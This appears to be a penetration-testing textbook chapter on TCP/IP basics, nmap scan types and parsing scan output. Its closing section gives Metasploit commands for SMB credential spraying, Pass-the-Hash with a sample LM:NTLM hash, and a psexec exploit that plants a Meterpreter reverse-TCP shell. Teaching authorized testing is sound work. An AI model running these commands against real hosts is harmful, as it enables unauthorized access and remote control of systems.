Chapter 3. Identifying Targets with Nmap, Scapy, and Python
The identification of targets, network surveillance, and active reconnaissance are all terms that you may see in place of each other, in an effort to describe the initial process of assessing an environment. Depending on the framework you are using, such as PTES, a custom company methodology, or some other industry standard, these terms may mean different things. The important thing to remember is that you are looking to see which hosts are live in the approved scope and what services, ports, and features they have open and responsive.
These facets will determine what activities you will perform going from here. All too often, this stage is short-lived, and assessors jump right into exploiting systems that they see responding to scans. Instead of being methodical and researching possible targets, new assessors jump in with both feet. This may have served them well in previous engagements where they got to the goal quickly, but there are other impacts of approaching assessments in this way that many assessors do not realize.
They may miss even lower-hanging fruit: systems that are easier still to exploit. If you, as an assessor, miss such a system and a malicious actor finds it, you may have an uncomfortable conversation with a client a few months down the road about why you missed the vulnerability. Keep in mind, however, that a penetration test is a snapshot in time, and environments are always changing. Controls and restrictions in the environment are adjusted, and systems are often reallocated, so old vulnerabilities can crop up in new assessments. Being methodical means that you may find more than one low-hanging target, which may help you build a rapport with your clients and in turn receive more work. Most importantly, it will point to the root causes of the flaws in the client's environment, which will continue to generate control lapses if they are not fixed.
The biggest impact of an assessor jumping the gun, so to speak, is that they may start exploiting systems that have no significant purpose in the organization. This means that although they cracked a box, it provided no value for moving through the network, or the vulnerability turned out not to be exploitable and could be considered a false positive. All of those initial scans then have to be restarted, losing precious time and increasing the chances that the objectives of the engagement will not be met. To understand how to scan the network, you first have to understand network frames, packets, messages, and datagrams so that you can manipulate each of them.
Understanding how systems communicate
There are entire series of books dedicated to how networks communicate; this chapter begins with some very basic information. If you already understand this material, I encourage you to read through it as a refresher, in case some new or different details are covered. There are also some references to the sizes of header components and payloads. These are specifics of how the network protocols are defined, and they can differ depending on what data is being transmitted and on the type of specialty network in use.
As a system generates data, the data is sent down through the system's Transmission Control Protocol (TCP) / Internet Protocol (IP) stack, which packages it into something that can be transmitted over the wire. If you have heard of the Open Systems Interconnection (OSI) model, then you know that it is how people discuss the way systems process data, whereas the TCP/IP model is the way systems actually operate.
Note
Every system has a TCP/IP stack, which represents the implementation of the TCP/IP Model. It is important to understand that a socket is what communication is executed through. This is done by linking source and destination IP addresses, and source and destination ports.
There is a range of ports called the ephemeral port range, whose bounds vary from system to system. These ports are also known as dynamic ports, and clients use them as the source ports for communication over a socket. They can also serve as destination ports on servers when the well-known port of a service only brokers the communication rather than carrying it; File Transfer Protocol (FTP) uses this technique. You need to know this because ephemeral ports typically do not need to be scanned while you are trying to identify targets: they are rarely service initiators, they are short-lived, and they are associated with specific communication streams only.
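The socket pairing described above can be observed with a short loopback experiment. This is a minimal sketch, assuming Python 3 and a working loopback interface; the function name show_socket_pair is made up for illustration, and the server here binds to an OS-chosen port as a stand-in for a well-known service port.

```python
import socket

def show_socket_pair():
    """Open a loopback TCP connection and return both endpoints of the socket."""
    # Server side: bind to port 0 so the OS picks a free port for this demo.
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(("127.0.0.1", 0))
    server.listen(1)
    server_addr = server.getsockname()

    # Client side: no bind() call, so the OS assigns an ephemeral source port.
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect(server_addr)
    conn, _peer = server.accept()

    source = client.getsockname()       # (client IP, ephemeral source port)
    destination = client.getpeername()  # (server IP, listening port)

    conn.close()
    client.close()
    server.close()
    return source, destination

if __name__ == "__main__":
    src, dst = show_socket_pair()
    print("source      %s:%d" % src)
    print("destination %s:%d" % dst)
```

Running it several times should show the source port changing between runs, which is why these ports are rarely worth including in a scan.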
Tip
Remember that administrators often hide known services in these higher port ranges to try to keep the services from being identified. This is known as security by obscurity. When scanning many hosts, you may need to skip these ranges because covering them takes more time. If you have not identified many services, or there are only a few hosts in the target network, you may want to include these ports in your scan range.
Layer 4 headers represent the TCP and User Datagram Protocol (UDP) headers and the targeting connection of ports for a specific IP. Layer 3 headers represent the IP and Internet Control Message Protocol (ICMP) headers. Layer 2 headers are related to frame headers, trailers, and the Address Resolution Protocol (ARP). The following diagram depicts the method of frame generation to communicate between two systems:

Now that you have seen how the frame is generated from the top down, let's move back up the stack to see how each component is deconstructed to get to the data. From there, you start with the Ethernet frame.
The Ethernet frame architecture
A frame is the way in which data travels from host to host, and a number of components make up a frame. You can read a substantial amount of information about frames on wikis and in engineering documents, but there are a couple of things you need to understand. Frames communicate via a hardware address known as a Media Access Control (MAC) address. Frames are slightly different for wireless networks and Ethernet networks. Also, at the end of a frame is a checksum, a basic mathematical check meant to verify the integrity of data after it has been transmitted over the wire. The following is a screenshot of an Ethernet frame with the end destination of a TCP port:

The next screenshot represents the contents of a frame with the ending destination of a UDP port:

Layer 2 in Ethernet networks
Frames are used to communicate within a broadcast domain, that is, between hosts on the near side of the default gateway, before any router is crossed. Once a router is crossed, the hardware address of the router's interface is used for the next broadcast domain. Traffic there is also typically sent in frames, depending on the communication protocols between the devices. This is repeated until the data reaches the destination delineated by the IP address. This is very important to understand because if you wish to run most Man-in-the-Middle (MitM) attacks with tools such as Responder or Ettercap, you have to be within the broadcast domain, as they are layer 2 attacks.
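To make the layer 2 addressing concrete, the following sketch unpacks the 14-byte header of an Ethernet II frame with Python's struct module. The sample bytes are a hand-built, hypothetical ARP request (the source MAC is made up), and the function names are illustrative rather than taken from any library.

```python
import struct

BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"

def format_mac(raw):
    """Render six raw bytes as a colon-separated MAC address."""
    return ":".join("%02x" % b for b in raw)

def parse_ethernet_header(frame):
    """Split the first 14 bytes of an Ethernet II frame into its three fields."""
    if len(frame) < 14:
        raise ValueError("an Ethernet II header is 14 bytes long")
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    return {
        "dst": format_mac(dst),
        "src": format_mac(src),
        "ethertype": ethertype,
        # A broadcast destination reaches every host in the broadcast domain.
        "broadcast": format_mac(dst) == BROADCAST_MAC,
    }

# Hypothetical frame: broadcast destination, made-up source MAC,
# EtherType 0x0806 (ARP), followed by 28 bytes of zeroed payload.
sample = bytes.fromhex("ffffffffffff" "005056c00008" "0806") + b"\x00" * 28
header = parse_ethernet_header(sample)
print(header)
```

The broadcast flag is the part that matters for layer 2 attacks: a frame addressed this way never crosses a router, so only hosts in the same broadcast domain see it.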
Layer 2 in wireless networks
The concept of wireless attacks is very similar, as you must be within range of the Service Set Identifier (SSID), or the actual wireless network name. Your communication path is slightly different depending on the design of the wireless network, but you use Access Points (APs) that are differentiated by Basic Service Set Identifiers (BSSIDs), a fancy name for the MAC addresses of the APs.
Once you are associated and authenticated into the network through the AP, you are part of the Basic Service Set (BSS) or the component of the enterprise network, but are limited to the range of the AP.
If you move through a wireless network and associate with a new AP because its signal is better, you become part of a new BSS. All BSSs are part of the Extended Service Set (ESS); if the wireless network contains more than one AP, it is an ESS. To be able to communicate with wireless engineers, you must understand that in an enterprise wireless network, the SSID is actually known as an Extended SSID (ESSID). Now that you have an understanding of layer 2 headers, it's time to look at IP headers.
Note
Depending on whose network documentation you are reading, an ESS is created if there is a Distribution System (DS) and an AP, or two APs and a DS. A DS is just a fancy name for a nonwireless network that connects APs. This is important to keep in mind because depending on the brand of product a company is using, the lingo may be slightly different.
The IP packet architecture
An IP header contains the data necessary for communicating through a network that uses IP addresses. This allows the communication to flow beyond broadcast domains. The following diagram shows an example IPv4 header:

You may have read that IPv4 is nearing its end, or that it is getting to be that way. The replacement, as you may have heard, is IPv6. This new address scheme provides a significant number of new host addresses, but as you can see in the comparison of the two header types, there are far fewer fields. One thing to know is that there are a large number of vulnerabilities associated with IPv6 compared to IPv4.
There are many reasons for this, but the most significant reason is that when organizations apply security concepts to their network, they forget that IPv6 is supported by default and is turned on. This means that when they configure protection mechanisms, they are usually using the IPv4 address. If IPv6 is enabled and the security devices are not aware of the different address types in the network or the associations with those devices, attacks can go unnoticed.
Think of it in this way: let's say you have a house with a front door and a back door, and there is a security guard only at the front door. The house has the same physical address, but the manners in which you get inside are completely different because it has two different doors. This security concept is very similar, and as such, organizations should remember that IPv6 can open up new holes into an organization if it does not consider the impact carefully. The following diagram shows an example of an IPv6 packet structure:

The TCP header architecture
A TCP packet header is much larger than a UDP packet header, relatively speaking. It has to accommodate the necessary sequencing, flags, and control mechanisms. Specifically, the packet is there to handle session setup and teardown using a number of different flags. These flags can be manipulated to get responses from the target system as an attacker wants.
The following figure shows a TCP header:

Understanding how TCP works
Before you understand how to execute scans and identify hosts, you need to understand how the TCP communication stream works. TCP is a connection-oriented protocol, which means that a session is established between two systems. Once this has taken place, the information that was originally destined for communication can be sent, and when all of the data has been sent, the connection is closed.
The TCP three-way handshake
The TCP handshake is also known as the three-way handshake, because three messages are sent back and forth between two systems before a communication socket is established. These three messages are SYN, SYN-ACK, and ACK. The system that is trying to initiate a connection starts with a packet that has the SYN flag set. The answering system returns a packet with the SYN and ACK flags set. Finally, the initiating system returns a packet to the original target system with the ACK flag set. In older systems, if the handshake was not completed, there could be unintended consequences. Today, most systems are smart enough to just reset (RST) the connection or close it gracefully.
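The three messages can be illustrated by packing minimal TCP headers and reading the flag byte back out. This is a sketch for illustration only: the ports, sequence numbers, and window size are arbitrary, the checksum is left at zero, and nothing is sent on the wire. The helper names are hypothetical.

```python
import struct

# TCP flag bits as they appear in byte 13 of the header.
FLAGS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}

def build_tcp_header(src_port, dst_port, seq, ack, flag_names):
    """Pack a minimal 20-byte TCP header (checksum left at zero for illustration)."""
    flags = 0
    for name in flag_names:
        flags |= FLAGS[name]
    offset_reserved = 5 << 4  # data offset of 5 words = 20 bytes, no options
    return struct.pack("!HHIIBBHHH", src_port, dst_port, seq, ack,
                       offset_reserved, flags, 8192, 0, 0)

def decode_flags(header):
    """Return the names of the flags set in a packed TCP header."""
    flag_byte = header[13]
    return [name for name, bit in FLAGS.items() if flag_byte & bit]

client_isn, server_isn = 1000, 5000  # arbitrary initial sequence numbers
handshake = [
    build_tcp_header(49152, 80, client_isn, 0, ["SYN"]),
    build_tcp_header(80, 49152, server_isn, client_isn + 1, ["SYN", "ACK"]),
    build_tcp_header(49152, 80, client_isn + 1, server_isn + 1, ["ACK"]),
]
for step in handshake:
    print(decode_flags(step))
```

Each side acknowledges the other's initial sequence number plus one, which is how both ends confirm that the previous message actually arrived.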
The UDP header architecture
Whereas TCP is a connection-oriented protocol, UDP is a simple connectionless protocol. As you can see in the following image, the header for UDP packets is significantly simpler, because UDP carries far less overhead than TCP does to maintain a socket.

Understanding how UDP works
UDP establishes a communication stream with a listening port. That port accepts the data and runs it up the TCP/IP stack as necessary. While TCP is needed for synchronized and reliable communication, UDP is not. Multimedia presentations are the best example of what UDP communication is used for. If you are watching a movie, you wouldn't care about a packet that might have been lost, because even if it is resent, it would make no sense to present it after the movie has moved on from the initial hiccup in presentation. Now that you have understood the basics of system communication, you need to understand how different flags are used to gather the required data using Nmap scan techniques.
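The lack of session setup is easy to see in code. The following sketch, assuming Python 3 and a working loopback interface, sends a single datagram to a listening UDP port without any handshake; udp_round_trip is a made-up name for this example.

```python
import socket

def udp_round_trip(message):
    """Send one datagram over loopback and return what the receiver saw."""
    receiver = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    receiver.bind(("127.0.0.1", 0))   # port 0: let the OS choose a free port
    receiver.settimeout(2.0)

    sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # No connect() and no handshake: the datagram is simply sent.
        sender.sendto(message, receiver.getsockname())
        data, source = receiver.recvfrom(4096)
    finally:
        sender.close()
        receiver.close()
    return data, source

if __name__ == "__main__":
    payload, sender_addr = udp_round_trip(b"probe")
    print(payload, sender_addr)
```

If the datagram were lost, nothing in the protocol would resend it; the timeout on the receiver is the only thing that would notice.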
Note
Each scan has a different purpose, and specific flags elicit different responses from operating systems depending on whether they are received out of order or not. The nmap port scanning techniques web page at http://nmap.org/book/man-port-scanning-techniques.html details this information succinctly.
Understanding Nmap
If there is one tool that is ubiquitous through most top-tier and new assessor toolkits, it is nmap. You may find different exploitation frameworks, web application tools, and other preferences, but nmap is a staple tool for many forms of assessment. Now, this is not to say that there are no other tools that can be executed with similar capabilities; it's just that they are not as capable. This includes tools such as AngryIP, HPing, FPing, NetScan, Unicorn scan, and others. From all of these tools, only two stand out as significantly different, and they are HPing and Unicorn scan.
The biggest mistake I see new assessors making with nmap is executing more than one scan at a time from the same host. What they do not realize is that nmap uses the integrated TCP/IP stack of the host operating system. This means that any additional scan executed does not speed up the results; instead, the multiple sessions must be handled at the same time by the operating system's TCP/IP stack. This in turn will not only slow down the results of each scan, but also increase errors, as each received packet can impact the results depending on the instance it was received by.
Each missing packet may be resent; this means that the scans slow down, not only because of the number of packets being resent, but because of the inconsistent results and the constrained TCP/IP stack. This means that you can execute only one instance of an nmap scan per host. Therefore, you must be as efficient as possible. So what is the solution? You can use nmap to execute a scan using the host TCP/IP stack and the Unicorn scan, which contains its own TCP/IP stack. The truth is that this entire situation can be avoided by efficiently using nmap instead of using multiple tools at once, which eats up relative clock cycles.
So, besides dealing with the limitations of resident TCP/IP stacks, there is also the limitation of how detailed packets can be manipulated through nmap. HPing provides the ability to relatively easily create custom packets that meet a specific intent. Despite this customization, HPing is efficient only at executing a test against a single host in a customized manner. If multiple hosts need simple pings with relative customization, FPing should be the tool of choice. This is especially because the results produced in Standard Out (STDOUT) by FPing are easily parsable for producing efficient and useful results. This is not to say that nmap is not a highly configurable tool, but rather to point out that it is not a replacement for an experienced and smart assessor, and that each tool has its place. So, you need to understand its limitations and supplement it as necessary.
Inputting the target ranges for Nmap
Nmap can take its targets either directly on the Command-line interface (CLI) or from a file. On the CLI, targets can be given in a variety of ways, including individual IP addresses, ranges of IP addresses, and Classless Inter-Domain Routing (CIDR) notation. A file can contain the same forms (CIDR notation, IP addresses, and ranges) as a list separated by line breaks or carriage returns. To pass targets on the CLI, all the user has to do is place them at the end of the command, as follows:
nmap -sS -vvv -p 80 192.168.195.0/24
For a file input method, all that is required is the -iL option followed by the filename:
nmap -sS -vvv -p 80 -iL nmap_subnet_file
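A target file for -iL can be generated rather than typed by hand. The sketch below uses Python's standard ipaddress module to expand CIDR blocks into one address per line; nmap accepts CIDR notation in the file directly, so expansion like this is mainly useful when you want to split or filter a range first. The function names and the output path are assumptions for illustration.

```python
import ipaddress

def expand_targets(spec):
    """Expand a CIDR block or a single address into a list of host strings."""
    network = ipaddress.ip_network(spec, strict=False)
    if network.num_addresses == 1:
        return [str(network.network_address)]
    # hosts() leaves out the network and broadcast addresses of the block.
    return [str(host) for host in network.hosts()]

def write_target_file(path, specs):
    """Write one target per line, a layout that -iL accepts."""
    with open(path, "w") as handle:
        for spec in specs:
            for host in expand_targets(spec):
                handle.write(host + "\n")

if __name__ == "__main__":
    hosts = expand_targets("192.168.195.0/24")
    print(len(hosts), hosts[0], hosts[-1])
```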
Executing the different scan types
Nmap supports a large number of different scans, but not all will be covered here. Instead, we will focus on the scans that you will use the most in your assessments. The four scans you will primarily use are the TCP connection scan (also known as the full-connection scan), the SYN scan (also known as the half-open or stealth scan), the ACK scan, and the UDP scan. These are highlighted to level-set knowledge for future scripting efforts.
Note
When performing external testing, you may get automatically blocked or shunned. This could be executed by the client's Internet Service Provider (ISP) or their Information Technology (IT) team. You should always have a backup public IP address in case your primary gets blocked. Then, just avoid doing the same thing that blocked you earlier. Next, document when you see the client doing a proactive block, as this positive activity highlights where they should consider continuing their investment and where they have gaps.
Executing TCP full connection scans
The TCP connection scan is one of the loudest or easiest to detect scans nmap has, but it is also one of the best for eliminating false positives. In earlier days, Incident Response (IR) and security teams paid a lot of attention to what was scanning the perimeter so that they could determine when they were going to be attacked. Times changed, as the amount of noise generated at the perimeter became excessive, and much of the access that was previously seen was mitigated by more advanced firewalls. Today, IR teams are again paying attention to the perimeter and using the activity they see to correlate events and potential future attempts to get into the network, or follow-up related to already executed attacks.
The TCP connect scan may provide the most accurate results, but automatic shunning mechanisms often block the source of the scan at the Internet Service Provider (ISP). To execute a TCP scan, all you have to do is indicate the associated scan type with -sT, as seen here:
nmap -sT -vvv -p 80 192.168.195.0/24
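The idea behind a full connection scan can be sketched with ordinary sockets: a port counts as open only when the operating system completes the three-way handshake. This is a simplified illustration, not a description of nmap's internals; connect_scan is a hypothetical helper, and it should only be pointed at hosts inside the approved scope.

```python
import socket

def connect_scan(host, ports, timeout=1.0):
    """Attempt a full TCP connection to each port and report which ones accept it."""
    results = {}
    for port in ports:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        try:
            # connect_ex returns 0 once the three-way handshake has completed;
            # any other value is an error code (refused, timed out, and so on).
            code = sock.connect_ex((host, port))
            results[port] = "open" if code == 0 else "closed or filtered"
        finally:
            sock.close()
    return results

if __name__ == "__main__":
    print(connect_scan("127.0.0.1", [22, 80, 445]))
```

Because every open port ends in a completed connection, the target's services log it, which is what makes this scan type loud but hard to dispute.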
Note
I have assessed many organizations that could be scanned with full connection scans only, as they would immediately shun the connection if a SYN scan was executed. The trick is to know your target and how advanced their environment is. Much of this can be determined during the pre-engagement phases.
Executing SYN scans
SYN scans are a type of TCP scan, and they are the most prominent scans you will probably run during your engagements. The reason is that they are much faster than TCP connection scans, and much quieter. However, they are not suitable for environments with extremely old or sensitive equipment types. Though most modern systems have no problem with closing a connection if it does not receive an ACK response in a timely manner, others could have problems. There have been repeated cases in the past where some legacy systems could have had a Denial of Service (DoS) situation if the connection was not completed. Today, these are much rarer, but always consider your customers' concerns, as they know their environment better than you do.
SYN scans are simply executed using the -sS flag, as shown here:
nmap -sS -vvv -p 80 192.168.195.0/24
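How a half-open scan reads its replies can be summarized as a small decision function. The mapping below follows the behavior described in the nmap documentation for SYN scans, reduced to the common cases; the function name and the "unknown" fallback are assumptions of this sketch, and sending the probes themselves (for example with Scapy) is left out.

```python
SYN, RST, ACK = 0x02, 0x04, 0x10

def classify_syn_probe(reply_flags):
    """Map the TCP flags of a reply to a SYN probe onto a port state.

    reply_flags is the flag byte of the reply, or None when nothing came back.
    """
    if reply_flags is None:
        return "filtered"   # silence usually means a filter dropped the probe
    if reply_flags & RST:
        return "closed"     # the target refused the connection
    if reply_flags & SYN and reply_flags & ACK:
        return "open"       # the second step of the handshake arrived
    return "unknown"        # anything else is outside this simplified sketch

for flags in (0x12, 0x14, None):
    print(flags, classify_syn_probe(flags))
```

The scanner never sends the final ACK, so the connection is never fully established; that is what makes the scan faster and quieter than a full connection scan.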
Executing ACK scans
ACK scans are the rarest of the three TCP scan types, and they may not be as directly useful as you think. Let's see when you would use an ACK scan. It is a slow scan, so you would use it if an SYN or TCP scan does not provide you with the results you needed. Nmap is pretty smart today; you usually don't need to perform the different types of scans to validate the type of target you are hitting. So, you would be trying to identify a resource that a full connection scan does not work on. This means that you may not be able to connect to the host for further attacks, because you were unable to complete a three-way handshake.
So where are ACK scans useful? People often ask this, and the answer is, "Firewalls." ACK scans are great for mapping firewall rule sets. Some systems react very strangely to ACK scans and provide additional data in return, so make sure you have tcpdump running on either an inline tap or on your system when you execute the ACK scan. The following is an example of how to execute an ACK scan:
nmap -sA -vvv -p80 192.168.195.0/24
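When mapping a rule set, the useful output of an ACK scan is simply which ports let the probe through. Per the nmap documentation, a reset in reply marks a port as unfiltered (reachable, but not necessarily open), while silence or an ICMP error marks it as filtered. The sketch below groups hypothetical results that way; the input format is an assumption made for this example.

```python
def map_ack_results(replies):
    """Group ports by how the path to them handled an unsolicited ACK.

    replies maps a port number to "rst" (a reset came back) or None (nothing did).
    """
    ports = {"unfiltered": [], "filtered": []}
    for port, reply in sorted(replies.items()):
        ports["unfiltered" if reply == "rst" else "filtered"].append(port)
    return ports

# Hypothetical observations from a single target.
observed = {80: "rst", 22: None, 443: "rst", 3389: None}
print(map_ack_results(observed))
```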
Executing UDP scans
You will see tons of blog posts and books and come across several training events that highlight the fact that UDP is a protocol that is often overlooked. In future chapters, we will highlight how dangerous this really is to an organization. UDP scans are extremely slow, and since there are just as many ports for UDP as for TCP, it will take a substantial amount of time to scan them. Additionally, UDP scans, for lack of a better term, lie. They will often report ports as open|filtered, which basically means that nmap does not know.
This can be infuriating in very large environments. Nmap also cannot grab service information from most UDP ports. Only the most common ports have specially packaged scan data, which allows nmap to determine whether the port is really open and what service is there. Because services are not always on their default ports, moving a UDP service to a nondefault port affects the results nmap returns far more than it does for TCP scans.
To execute a UDP scan, all that is needed is the flag for the scan set to -sU, as shown here:
nmap -sU -vvv -p161 192.168.195.0/24
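The reason UDP results are so ambiguous becomes clearer when the possible replies are laid out. The following sketch follows the states described in the nmap documentation for UDP scans, with one simplification that is an assumption of this example: every destination-unreachable code other than port unreachable is treated as filtered. The function name and input format are hypothetical.

```python
def classify_udp_probe(reply):
    """Map the reply to a UDP probe onto a port state.

    reply is "udp" for a UDP response, an (icmp_type, icmp_code) tuple for an
    ICMP error, or None when nothing came back after retransmissions.
    """
    if reply is None:
        return "open|filtered"   # no way to tell a silent service from a filter
    if reply == "udp":
        return "open"            # the service answered
    icmp_type, icmp_code = reply
    if icmp_type == 3 and icmp_code == 3:
        return "closed"          # ICMP port unreachable
    if icmp_type == 3:
        return "filtered"        # other unreachable errors (simplified)
    return "unknown"

for reply in ("udp", (3, 3), (3, 13), None):
    print(reply, classify_udp_probe(reply))
```

Many UDP services stay silent unless the probe contains a payload they understand, which is why so many ports end up in the open|filtered bucket.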
Executing combined UDP and TCP scans
So now, you know how to run your primary scans, but running both TCP and UDP scans one after the other can take very long periods of time. To save time, you can combine the scanning of resources by targeting ports for both types of scans. Be smart about this, however; if you use a lot of ports in this scan, it will take forever to complete. So, this scan is great for targeting the top ports that you can use to identify vulnerable resources that have the best chance of being compromised, such as the following:

To execute a combined scan, all that is needed is to flag the two types of scans you want to use and itemize the ports you want to scan for each protocol. This is done by providing the -p option, followed by U: for the UDP ports and T: for the TCP ports. See the following example, which highlights only a few ports for the sake of brevity:
nmap -sS -sU -vvv -p U:161,139,T:8080,21 192.168.195.0/24
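Nmap expects the protocol-qualified port lists as a single comma-separated value after -p, with no spaces; anything after a space is read as a target. When the port lists come from a script, building that value programmatically avoids the mistake. This is a minimal sketch with hypothetical helper names; it only assembles the argument list and does not run nmap.

```python
def build_port_spec(udp_ports, tcp_ports):
    """Join per-protocol port lists into a single value for nmap's -p option."""
    parts = []
    if udp_ports:
        parts.append("U:" + ",".join(str(p) for p in udp_ports))
    if tcp_ports:
        parts.append("T:" + ",".join(str(p) for p in tcp_ports))
    return ",".join(parts)

def build_combined_scan(target, udp_ports, tcp_ports):
    """Return the argument list for a combined SYN and UDP scan (not executed here)."""
    return ["nmap", "-sS", "-sU", "-vvv", "-p",
            build_port_spec(udp_ports, tcp_ports), target]

print(" ".join(build_combined_scan("192.168.195.0/24", [161, 139], [8080, 21])))
```

Keeping the command as a list of arguments means it can be handed to subprocess.run without shell quoting concerns.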
Skipping the operating system scans
I have seen a number of new assessors jump all over the operating system scan for nmap with gleeful excitement. It is one of the quickest ways my team members know to identify someone who does not assess enterprise environments regularly. Here are the reasons:
- Operating system scans are very noisy
- They can bring legacy systems down, because they perform chained scans to determine the responses and validate the system type
- Against an old or legacy system, they can be damaging
- In the past, certain printers would have issues, including printing ink-soaked black pages until they were shut off or ran out of paper
The biggest reason seasoned assessors do not use this scan is that it provides little value today. You can identify the details this scan provides faster, more easily, and more quietly with other methods. For example, if you see port 445 open, it is usually either a system running a Samba variant or a Windows host. Learning the ports, service labels, and versions associated with each operating system will do a better job of identifying the OS and version than this scan will. Additionally, if you cannot identify a system by this method, it is unlikely that nmap will be able to do so either, although this depends on your skill level.
Tip
As you gain experience, you learn how to passively identify live hosts using tools such as Responder, tcpdump, and Wireshark. This means that you don't need to scan for hosts and, in essence, you are being quieter. This is also a better simulation of real malicious actors.
Different output types
Nmap has four output types, and they are extremely useful depending on the situation. They are to the screen, STDOUT, or to three different file types. These file types have different purposes and advantages. There is the nmap output, which looks identical to STDOUT but just in a file; this is done with -oN. Then, there are the Grepable and eXtensible Markup Language (XML) outputs, described as follows. All outputs can be produced at the same time using the -oA flag.
Understanding the Nmap Grepable output
There is the Grepable output, which, to tell the truth, is not that great for grepping out data. It can provide an easy means to extract components of data to build lists quickly and easily, but to properly parse it with grep, sed, and awk, you actually have to insert characters to signify where data should be extracted. The Grepable output is produced with the -oG flag.
After you have a Grepable file, the most useful way of parsing the data is by keying on certain components of it. You are usually looking for open ports related to specific services. So, you can extract these details by executing commands such as the following:
cat nmap_scan.gnmap | grep 445/open/tcp | cut -d" " -f2 >> /root/Desktop/smb_hosts_list
The example shows a Grepable file being pushed to STDOUT and then piped to grep, which searches for open 445 ports. This can be done with grep and cut only, but the longer form is very easy to read and understand. Once the ports are found, cut extracts the IP addresses and appends them to a flat file named smb_hosts_list. If you look at the nmap_scan.gnmap file, you would potentially see lines that contain details such as these:
Host: 192.168.195.112 () Ports: 445/open/tcp/
As you can see, the line contains the 445/open/tcp detail, which allows us to target that specific line. We then cut using the space as the delimiter and select field two, which, if you count the fields separated by spaces, is the IP address. This technique is very common and is useful for quickly identifying what is open by IP address and creating multiple flat files based on the service or port.
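The same extraction can be done in Python, which makes it easier to avoid one pitfall of a plain substring match: a pattern such as 445/open/tcp also matches a port like 8445. The sketch below compares each port entry individually. The function name is hypothetical, and the sample lines mirror the simplified line format shown above rather than a complete .gnmap file.

```python
def hosts_with_open_port(lines, port, proto="tcp"):
    """Return the IP of every 'Host:' line that lists port/open/proto."""
    needle = "%d/open/%s/" % (port, proto)
    hosts = []
    for line in lines:
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        ports_field = line.split("Ports:", 1)[1]
        entries = [entry.strip() for entry in ports_field.split(",")]
        # startswith keeps 8445/open/tcp from matching a search for 445.
        if any(entry.startswith(needle) for entry in entries):
            hosts.append(line.split()[1])   # field two is the IP address
    return hosts

sample_lines = [
    "Host: 192.168.195.112 () Ports: 445/open/tcp/",
    "Host: 192.168.195.113 () Ports: 8445/open/tcp/",
    "Host: 192.168.195.114 () Status: Up",
]
print(hosts_with_open_port(sample_lines, 445))
```

Writing the returned list to a file, one address per line, produces the same kind of flat file as the cut pipeline.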
As shown in Chapter 1, Understanding the Penetration Testing Methodology, you use the rhosts field in the Metasploit modules to target hosts by CIDR notation or range. When you create flat files, you can use Metasploit modules to hit a list of hosts instead by referencing the flat file. To run the Metasploit console, execute this command:
msfconsole
If you are running Metasploit Professional from the command line, use the following command:
msfpro
Now see this example, wherein we will try and see whether the password we cracked earlier works on any host in the rest of the network:
use auxiliary/scanner/smb/smb_login
set SMBUser administrator
set SMBPass test
set SMBDomain Workgroup
set RHOSTS file:/root/Desktop/smb_hosts_list
run
The use command selects the module you want to use, the smb_login module in this case, which verifies Server Message Block (SMB) credentials. The set SMBUser command chooses the username you are going to execute this attack against. The set SMBPass command selects the password that is going to be used in this module. The set SMBDomain command sets the domain for the organization. The set RHOSTS command points the module at the flat file of hosts. The run command executes the auxiliary module. In earlier years, you had to use run to execute an auxiliary module and exploit to execute an exploit module. Today, these are largely interchangeable, with the exception of post exploitation modules, which require run, as highlighted at https://www.offensive-security.com/metasploit-unleashed/windows-post-gather-modules/.
Tip
If you are attacking with a local account, you should set the domain to workgroup. When attacking a domain account, you should set the domain to the actual domain of the organization.
Metasploit Professional is a tool that helps optimize penetration testing efforts, and it has a web Graphical User Interface (GUI). Metasploit Pro provides a lot of great features, but if you need to pivot through multiple network tiers protected by firewalls, the console is the best option. To learn how to execute a manual pivot, refer to https://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot, which covers port-based pivoting, manual routing, and SOCKS proxies.
This method of attack is very common; you find out the credentials, identify the services the credentials may work on, and then build flat files to target hosts. Next, you reference those flat files to check the hosts for a vulnerability. Once you have verified those hosts as vulnerable, you can exploit them with Pass-the-Hash (PtH) using a Process Execution (PSEXEC) attack (if you had the hash) or a standard-credentialed PSEXEC, as shown in the following code:
Tip
PtH is an attack that takes advantage of a native Windows weakness related to how systems authenticate on a network. Instead of requiring a Challenge/Response authentication method, the hashed password can be passed directly to the host. This means that you do not have to crack the Local Area Network Manager (LM) or New Technology LM (NTLM) hashes. Many Metasploit modules can use either credentials or hashes against SMB services.
msfconsole
use exploit/windows/smb/psexec
set SMBUser administrator
set SMBPass test
set SMBDomain Workgroup
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.195.112
set LPORT 443
exploit -j
The set payload command chooses the payload that is going to be dropped on the host and then executed. The reverse_tcp payload dials back to the attack box to establish a connection. Had it been a bind payload, the attack box would have connected directly to a listening port on the target after execution. RHOST and LPORT signify the target host we want to connect to and the port on the attack box that we want to listen on for the returning communication. The exploit -j command runs the exploit and then backgrounds the results, which allows you to focus on other things, returning to the session as needed with sessions -i <session number>. Keep in mind that you do not require cracked credentials to execute smb_login or psexec; instead, you can just PtH. In that case, the configuration for the smb_login command would look like the following:
Note
All payloads that are dropped on the box are deleted when the process execution completes. If the execution process is interrupted, the payload may stay on the system. Better secured environments that use tools that monitor processes may have instances of this if the tools are not correctly configured to delete the generator of those detected processes.
msfconsole
use auxiliary/scanner/smb/smb_login
set SMBUser administrator
set SMBPass 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
set SMBDomain Workgroup
set RHOSTS file:/root/Desktop/smb_hosts_list
run
The following configuration would be for the psexec command:
msfconsole
use exploit/windows/smb/psexec
set SMBUser administrator
set SMBPass 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
set SMBDomain Workgroup
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.195.112
set LPORT 443
exploit -j
